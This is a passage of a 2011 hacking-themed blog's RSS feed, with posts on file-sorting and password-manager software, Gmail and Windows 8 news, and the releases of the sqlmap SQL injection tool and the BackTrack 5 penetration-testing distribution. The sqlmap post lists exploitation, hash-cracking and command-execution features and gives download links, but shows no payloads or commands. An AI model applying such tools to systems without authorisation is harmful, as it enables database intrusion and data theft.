&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&amp;nbsp;Filter files and folders by name, extension, location, size and/or date&lt;br /&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&amp;nbsp;Move, Copy, Compress, Extract, Rename, Open With, List, Delete, Ignore actions&lt;br /&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&amp;nbsp;Collect patterns in different profiles and assign an image to each one&lt;br /&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&amp;nbsp;Support also Context-Menu, Send-To and Command-Line&lt;br /&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&amp;nbsp;Support automatic software update&lt;br /&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&amp;nbsp;Support encryption to protect your profiles with a password&lt;br /&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&amp;nbsp;Support internal, system and custom environment variables&lt;br /&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&amp;nbsp;Support log file creation to verify sorting operations&lt;br /&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&amp;nbsp;Support for Unicode filenames&lt;br /&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&amp;nbsp;Available with Multi-language interface&lt;br /&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&amp;nbsp;Available in both installer and portable versions&lt;/span&gt;&lt;/span&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;https://sourceforge.net/projects/dropit/files/DropIt/v3.5/DropIt_v3.5_Setup.exe/download&quot;&gt;Click here to Download&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://dropit.sourceforge.net/Page/dropit_b.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;258&quot; src=&quot;http://dropit.sourceforge.net/Page/dropit_b.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/speed-up-your-file-manager-with-dropit.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-8707558154924077705</guid><pubDate>Thu, 25 Aug 2011 05:21:00 +0000</pubDate><atom:updated>2011-08-24T22:21:40.810-07:00</atom:updated><title>Password Safe</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means &lt;br /&gt;
&lt;br /&gt;
KeePass Password Safe is a free, open source, light-weight and easy-to-use password manager for Windows. You can store your passwords in a highly-encrypted database, which is locked with one master password or key file.&lt;/span&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;a href=&quot;http://sourceforge.net/projects/keepass/files/KeePass%202.x/2.16/KeePass-2.16-Setup.exe/download&quot;&gt;Click here to download&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://sourceforge.net/dbimage.php?id=168061&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;http://sourceforge.net/dbimage.php?id=168061&quot; width=&quot;362&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://sourceforge.net/dbimage.php?id=168063&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;345&quot; src=&quot;http://sourceforge.net/dbimage.php?id=168063&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://sourceforge.net/dbimage.php?id=168057&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;280&quot; src=&quot;http://sourceforge.net/dbimage.php?id=168057&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/password-safe.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-807564616059698604</guid><pubDate>Tue, 23 Aug 2011 05:50:00 +0000</pubDate><atom:updated>2011-08-22T22:50:37.512-07:00</atom:updated><title>SQLmap 0.9 Released – SQL Injection Tool</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means &lt;span class=&quot;fullpost&quot;&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #333333; font-size: 12px; line-height: 20px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;margin-bottom: 10px; margin-top: 10px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;strong&gt;Introduction:&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.&lt;/div&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;margin-bottom: 10px; margin-top: 10px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;&quot;&gt;&lt;strong&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;New Features:&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;ul&gt;&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Rewritten SQL injection detection engine&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Support to directly connect to the database without passing via a SQL injection, -d switch&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Added full support for both time-based blind SQL injection and error-based SQL injection techniques&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Implemented support for SQLite 2 and 3&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Implemented support for Firebird&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Implemented support for Microsoft Access, Sybase and SAP MaxDB&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Added support to tamper injection data with –tamper switch&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Added support to fetch unicode data&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Added support to use persistent HTTP(s) connection for speed improvement, –keep-alive switch&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Implemented several optimization switches to speed up the exploitation of SQL injections&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Support to parse and test forms on target url, –forms switch&lt;/span&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Added switches to brute-force tables names and columns names with a dictionary attack, –common-tables and –common-columns.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;margin-bottom: 10px; margin-top: 10px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;strong&gt;Demo:&lt;/strong&gt;&lt;/div&gt;&lt;div align=&quot;center&quot;&gt;&lt;iframe frameborder=&quot;0&quot; height=&quot;390&quot; src=&quot;http://www.youtube.com/embed/RsQ52eCcTi4?rel=0&quot; title=&quot;YouTube video player&quot; width=&quot;480&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;div style=&quot;margin-bottom: 10px; margin-top: 10px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;strong&gt;Download:&lt;/strong&gt;&amp;nbsp;&lt;a href=&quot;http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz&quot; style=&quot;color: #5077d3; font-weight: 800; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;sqlmap-0.9.tar.gz&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/sqlmap-09-released-sql-injection-tool.html</link><author>noreply@blogger.com (paventhan)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img.youtube.com/vi/RsQ52eCcTi4/default.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-2881099884957373258</guid><pubDate>Tue, 23 Aug 2011 05:47:00 +0000</pubDate><atom:updated>2011-08-22T22:47:53.020-07:00</atom:updated><title>BackTrack 5 Released</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;This is only for educational purpose not any other means&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;The BackTrack Dev team has worked furiously in the past months on BackTrack 5, code name “revolution” – they released it on May 10th. This new revision has been built from scratch, and boasts several major improvements over all our previous releases. It’s based on Ubuntu Lucid LTS – Kernel 2.6.38, patched with all relevant wireless injection patches. Fully open source and GPL compliant.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;img src=&quot;http://www.insecure.in/images/backtrack-5.png&quot; /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;New in Version 5 :&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;ul&gt;&lt;li&gt;Based on Ubuntu 10.04 LTS&lt;/li&gt;
&lt;li&gt;Linux kernel 2.6.38 (with wireless injection patches)&lt;/li&gt;
&lt;li&gt;KDE 4.6&lt;/li&gt;
&lt;li&gt;GNOME 2.6&lt;/li&gt;
&lt;li&gt;32-bit and 64-bit support&lt;/li&gt;
&lt;li&gt;Metasploit 3.7.0&lt;/li&gt;
&lt;li&gt;Forensics mode (a forensically sound instance)&lt;/li&gt;
&lt;li&gt;Stealth mode (without generating network traffic)&lt;/li&gt;
&lt;li&gt;Initial ARM image of BackTrack (for Android-powered devices)&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Download: &lt;a href=&quot;http://www.backtrack-linux.org/downloads/&quot;&gt;http://www.backtrack-linux.org/downloads/&lt;/a&gt;&lt;/div&gt;&lt;/span&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/backtrack-5-released.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-44321356347468635</guid><pubDate>Sat, 20 Aug 2011 06:51:00 +0000</pubDate><atom:updated>2011-08-19T23:51:07.798-07:00</atom:updated><title>Gmails New Look</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;This is only for educational purpose not any other means&lt;br /&gt;
&lt;br /&gt;
In order to change the new look for ur gmail , just login to ur account and go to the &lt;strong&gt;Mail settings&lt;/strong&gt; , which was in ur right hand side top corner , then in that settings go to themes and scroll down u can see a option called Preview and Preview(Dense) select any one , thats it you have done it dude , now u can enjoy the new feature of gmail&#39;s look........&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI_gVwZ7-RG6C2PVVhm7sVtfpywrzuhRWQPxoRKbFA6-4Bg-vvZ43FwFQt3Z0hsEOjlvYUDb8cEKDHj1NLWRWXhkhuF5Yzh1FoMP8Ox0_JBYP0TXh_vH6bymbdd-KCfRQTTWB_IwdZOOw/s1600/threadlist-large.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;255&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI_gVwZ7-RG6C2PVVhm7sVtfpywrzuhRWQPxoRKbFA6-4Bg-vvZ43FwFQt3Z0hsEOjlvYUDb8cEKDHj1NLWRWXhkhuF5Yzh1FoMP8Ox0_JBYP0TXh_vH6bymbdd-KCfRQTTWB_IwdZOOw/s400/threadlist-large.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQcTutjlsCtOmuAH3xV3UaXJn5vUQQpuJm7YsSqsChRi-ACWKsDCA1uQB4wL047bYHJkiifULltpMfs0YRzAv4Uj6rag99KNYOfbbpkGdRU4gnDVsOdIVWk9k51UNbTSoGSCKtQ7mvGkw/s1600/conversation-large.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;255&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQcTutjlsCtOmuAH3xV3UaXJn5vUQQpuJm7YsSqsChRi-ACWKsDCA1uQB4wL047bYHJkiifULltpMfs0YRzAv4Uj6rag99KNYOfbbpkGdRU4gnDVsOdIVWk9k51UNbTSoGSCKtQ7mvGkw/s400/conversation-large.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;  &lt;/span&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/gmails-new-look.html</link><author>noreply@blogger.com (paventhan)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI_gVwZ7-RG6C2PVVhm7sVtfpywrzuhRWQPxoRKbFA6-4Bg-vvZ43FwFQt3Z0hsEOjlvYUDb8cEKDHj1NLWRWXhkhuF5Yzh1FoMP8Ox0_JBYP0TXh_vH6bymbdd-KCfRQTTWB_IwdZOOw/s72-c/threadlist-large.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-2471679059349227547</guid><pubDate>Fri, 19 Aug 2011 07:24:00 +0000</pubDate><atom:updated>2011-08-19T00:24:24.352-07:00</atom:updated><title>Windows 8 New Features Updated</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;This is only for educational purpose not any other means&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Microsoft Windows President Steven Sinofsky is continuing to trickle out introductory posts on the new “Building Windows 8″ blog. In the August 17 installment, he shared — as he did three years ago with Windows 7 — a list of the feature teams building the next version of Windows.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Sinofsky blogged that Microsoft has 35 different feature teams, each with 25 to 40 developers, plus testers and program managers — in the &lt;a href=&quot;http://en.wikipedia.org/wiki/Windows_8&quot;&gt;Windows 8&lt;/a&gt; organization. The word “feature” may mean an area or a component in Windows. Here’s the Windows 8 feature-team list:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;App Compatibility and Device Compatibility&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;App Store&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Applications and Media Experience&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;App Experience&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Core Experience Evolved&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Device Connectivity&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Devices &amp;amp; Networking Experience&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Ecosystem Fundamentals&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Engineer Desktop&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Engineering System&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Enterprise Networking&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Global Experience&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Graphics Platform&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Hardware Developer Experience&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Human Interaction Platform&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Hyper-V&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;In Control of Your PC&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Kernel Platform&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Licensing and Deployment&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Media Platform&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Networking Core&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Performance&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Presentation and Composition&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Reliability, Security, and Privacy&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Runtime Experience&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Search, View, and Command&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
